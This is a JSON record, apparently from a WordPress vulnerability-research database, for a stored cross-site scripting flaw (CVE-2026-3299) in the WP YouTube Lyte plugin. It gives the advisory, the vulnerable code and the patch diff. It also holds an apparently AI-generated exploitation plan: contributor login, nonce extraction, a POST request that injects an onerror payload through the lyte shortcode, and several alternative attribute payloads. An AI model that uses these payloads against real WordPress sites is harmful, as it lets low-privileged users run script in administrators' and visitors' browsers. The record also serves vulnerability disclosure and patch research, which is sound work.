[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f98BP09sv57xdEaQ8vJ5Ax7KGlAJFAxvHeVyufhNgtC8":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":24,"research_verified":25,"research_rounds_completed":26,"research_plan":27,"research_summary":28,"research_vulnerable_code":29,"research_fix_diff":30,"research_exploit_outline":31,"research_model_used":32,"research_started_at":33,"research_completed_at":34,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":25,"poc_model_used":9,"poc_verification_depth":9,"source_links":35},"CVE-2026-3299","wp-youtube-lyte-authenticated-contributor-stored-cross-site-scripting-via-lyte-shortcode","WP YouTube Lyte \u003C= 1.7.29 - Authenticated (Contributor+) Stored Cross-Site Scripting via lyte Shortcode","The WP YouTube Lyte plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'lyte' shortcode in all versions up to, and including, 1.7.29 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","wp-youtube-lyte",null,"\u003C=1.7.29","1.7.30","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-15 12:25:22","2026-04-16 01:24:34",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fde09d051-d124-4397-bd1c-b193acd6c186?source=api-prod",1,[22,23],"readme.txt","wp-youtube-lyte.php","researched",false,3,"# Exploitation Research Plan: CVE-2026-3299 (WP YouTube Lyte Stored XSS)\n\n## 1. Vulnerability Summary\nThe **WP YouTube Lyte** plugin (\u003C= 1.7.29) is vulnerable to **Authenticated Stored Cross-Site Scripting (XSS)**. The vulnerability exists in the handling of the `[lyte]` shortcode attributes. When a user with Contributor-level permissions or higher includes the shortcode in a post, the plugin fails to sanitize or escape the attributes (such as `id`, `audio`, or `playlist`) before rendering them into the HTML output. This allows an attacker to break out of HTML attributes and inject malicious JavaScript that executes when any user (including administrators) views the post.\n\n## 2. Attack Vector Analysis\n*   **Endpoint**: Standard WordPress post editor (Gutenberg or Classic Editor).\n*   **Vulnerable Action**: Saving or updating a post\u002Fpage containing the `[lyte]` shortcode.\n*   **Vulnerable Parameter**: Attributes within the `[lyte]` shortcode (e.g., `id`, `audio`, `playlist`).\n*   **Authentication Level**: **Contributor+** (requires `edit_posts` capability).\n*   **Preconditions**: The plugin must be active. No specific settings are required to enable the shortcode.\n\n## 3. Code Flow\n1.  **Registration**: The plugin registers the `[lyte]` shortcode (likely via `add_shortcode( 'lyte', 'shortcode_lyte' )` in the truncated portion of `wp-youtube-lyte.php`).\n2.  **Processing**: When a post is viewed, WordPress parses the content and calls the shortcode handler.\n3.  **Attribute Extraction**: The handler uses `shortcode_atts()` to extract user-supplied attributes like `id`, `audio`, and `playlist`.\n4.  **Rendering (Sink)**: The handler builds an HTML string (often a `div` with class `lyte`) to represent the player. It concatenates the extracted attributes into this string.\n5.  **Vulnerability**: The code fails to wrap the attribute values in `esc_attr()`. For example:\n    ```php\n    \u002F\u002F Vulnerable Pattern (Inferred)\n    return '\u003Cdiv class=\"lyte\" id=\"lyte_' . $atts['id'] . '\" data-id=\"' . $atts['id'] . '\">\u003C\u002Fdiv>';\n    ```\n6.  **Output**: The unescaped input is returned to the page content and rendered in the browser.\n\n## 4. Nonce Acquisition Strategy\nThis exploit involves a standard WordPress post-creation workflow. No custom plugin nonces are required for the injection, but the automated agent must handle the standard WordPress `_wpnonce` for saving posts.\n\n1.  **Login**: Authenticate as a **Contributor** user.\n2.  **Navigate**: Go to `\u002Fwp-admin\u002Fpost-new.php`.\n3.  **Extract Nonce**: Use `browser_eval` to extract the `_wpnonce` and `post_ID` from the editor page.\n    *   `_wpnonce`: `document.querySelector('#_wpnonce')?.value || wp.data.select('core\u002Feditor').getOption('nonce')`\n    *   `post_ID`: `document.querySelector('#post_ID')?.value`\n4.  **Note**: If using the Gutenberg editor, nonces are often handled via the REST API or localized into the `wpApiSettings` or `wp` global objects.\n\n## 5. Exploitation Strategy\nThe goal is to inject an event handler into the `id` or another attribute of the `[lyte]` shortcode.\n\n### Step 1: Login as Contributor\nUse the `http_request` tool to log in as a user with the Contributor role.\n\n### Step 2: Create a Post with Malicious Shortcode\nSubmit a POST request to `\u002Fwp-admin\u002Fpost.php` (or use the REST API) to save a post containing the payload.\n\n*   **URL**: `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fpost.php`\n*   **Method**: `POST`\n*   **Content-Type**: `application\u002Fx-www-form-urlencoded`\n*   **Body Parameters**:\n    *   `action`: `editpost`\n    *   `post_ID`: `[EXTRACTED_ID]`\n    *   `_wpnonce`: `[EXTRACTED_NONCE]`\n    *   `post_title`: `Lyte XSS Test`\n    *   `post_content`: `[lyte id='\">\u003Cimg src=x onerror=alert(document.domain)>' \u002F]`\n    *   `publish`: `Publish` (or `save` for draft)\n\n### Step 3: Trigger the XSS\nNavigate to the newly created post URL as an **Administrator**.\n\n## 6. Test Data Setup\n1.  **Plugin**: Ensure `wp-youtube-lyte` version 1.7.29 is installed and activated.\n2.  **User**: Create a user with the `contributor` role.\n    *   `wp user create attacker attacker@example.com --role=contributor --user_pass=password`\n3.  **Environment**: No YouTube API key is required, as the shortcode rendering logic triggers before any API calls are made.\n\n## 7. Expected Results\n1.  When the post is rendered, the HTML source will contain a broken attribute:\n    ```html\n    \u003Cdiv class=\"lyte\" id=\"lyte_\">\u003Cimg src=x onerror=alert(document.domain)>\" ...>\n    ```\n2.  The browser will execute the `onerror` handler, displaying an alert box with the document domain.\n\n## 8. Verification Steps\n1.  **Manual Check**: Access the post as Admin and confirm the JS execution.\n2.  **WP-CLI Check**: Verify the content is stored exactly as injected.\n    *   `wp post get [POST_ID] --field=post_content`\n3.  **Source Inspection**: Use `http_request` to fetch the post page and search for the unescaped payload:\n    *   `grep 'onerror=alert' response_body.html`\n\n## 9. Alternative Approaches\nIf the `id` attribute is sanitized via a strict regex (e.g., only 11 alphanumeric characters), target other attributes mentioned in `readme.txt` or `lyte_parse`:\n*   **Audio**: `[lyte id='_SQkWbRublY' audio='true\" onmouseover=\"alert(1)\" style=\"display:block;width:100px;height:100px;background:red;\"']`\n*   **Playlist**: `[lyte id='PLA486E741B25F8E00' playlist='true\" onmouseover=\"alert(1)\"']`\n*   **Arbitrary Parameters**: Try parameters processed in `lyte_parse` (line 123-131): `stepSize`, `showinfo`, `start`, `enablejsapi`, `hqThumb`.\n    *   Example: `[lyte id='_SQkWbRublY' showinfo='1\" onmouseover=\"alert(1)\"']`\n\nThese parameters are extracted using `preg_match` in `lyte_parse`, but the shortcode handler might pass them directly into the template before that logic applies.","The WP YouTube Lyte plugin for WordPress is vulnerable to Authenticated Stored Cross-Site Scripting via the 'lyte' shortcode. Due to insufficient input sanitization and output escaping on attributes such as 'id', 'start', and 'stepSize', an attacker with contributor-level access can inject arbitrary web scripts into posts that execute whenever a user views the affected page.","\u002F\u002F wp-youtube-lyte.php line 657\nfunction shortcode_lyte($atts) {\n    extract(shortcode_atts(array(\n        'id'        => '',\n        'audio'     => '',\n        'playlist'  => '',\n        'start'     => '',\n        'showinfo'  => '',\n        'stepsize'  => '',\n        'hqthumb'   => '',\n    ), $atts));\n\n    $qs = '';\n\n    if ($audio) { $proto = 'httpa'; } else { $proto = 'httpv'; }\n    if ( $start !== '' ) { $qs .= '&start=' . $start; }\n    if ( $showinfo === 'false' ) { $qs .= '&showinfo=0'; }\n    if ( $hqthumb ) { $qs .= '&hqThumb=1'; }\n    if ( $stepsize ) { $qs .= '#stepSize=' . $stepsize; }\n    if ( $playlist ) { $action = 'playlist?list=';} else { $action = 'watch?v='; }\n\n    return lyte_parse( $proto . ':\u002F\u002Fwww.youtube.com\u002F' . $action . $id . $qs );\n}","--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-youtube-lyte\u002F1.7.29\u002Fwp-youtube-lyte.php\t2025-11-13 22:42:24.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-youtube-lyte\u002F1.7.30\u002Fwp-youtube-lyte.php\t2026-03-14 15:08:42.000000000 +0000\n@@ -657,13 +657,13 @@\n     $qs = '';\n \n     if ($audio) { $proto = 'httpa'; } else { $proto = 'httpv'; }\n-    if ( $start !== '' ) { $qs .= '&start=' . $start; }\n+    if ( $start !== '' ) { $qs .= '&start=' . esc_attr( $start ); }\n     if ( $showinfo === 'false' ) { $qs .= '&showinfo=0'; }\n     if ( $hqthumb ) { $qs .= '&hqThumb=1'; }\n-    if ( $stepsize ) { $qs .= '#stepSize=' . $stepsize; }\n+    if ( $stepsize ) { $qs .= '#stepSize=' . esc_attr( $stepsize ); }\n     if ( $playlist ) { $action = 'playlist?list=';} else { $action = 'watch?v='; }\n \n-    return lyte_parse( $proto . ':\u002F\u002Fwww.youtube.com\u002F' . $action . $id . $qs );\n+    return lyte_parse( $proto . ':\u002F\u002Fwww.youtube.com\u002F' . $action . esc_attr( $id ) . $qs );\n }","1. Authenticate as a user with at least Contributor-level privileges (e.g., ability to edit posts).\n2. Create a new post or edit an existing one using the WordPress editor.\n3. Embed the [lyte] shortcode using a malicious payload in the 'id' or 'start' attribute, such as: [lyte id='\">\u003Cimg src=x onerror=alert(document.domain)>' \u002F].\n4. Save the post as a draft or publish it.\n5. Navigate to the post's public URL (or have an administrator view it). The unescaped attribute will break out of the HTML tag's attributes, executing the injected JavaScript.","gemini-3-flash-preview","2026-04-16 15:33:57","2026-04-16 15:34:42",{"type":36,"vulnerable_version":37,"fixed_version":11,"vulnerable_browse":38,"vulnerable_zip":39,"fixed_browse":40,"fixed_zip":41,"all_tags":42},"plugin","1.7.29","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-youtube-lyte\u002Ftags\u002F1.7.29","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-youtube-lyte.1.7.29.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-youtube-lyte\u002Ftags\u002F1.7.30","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-youtube-lyte.1.7.30.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-youtube-lyte\u002Ftags"]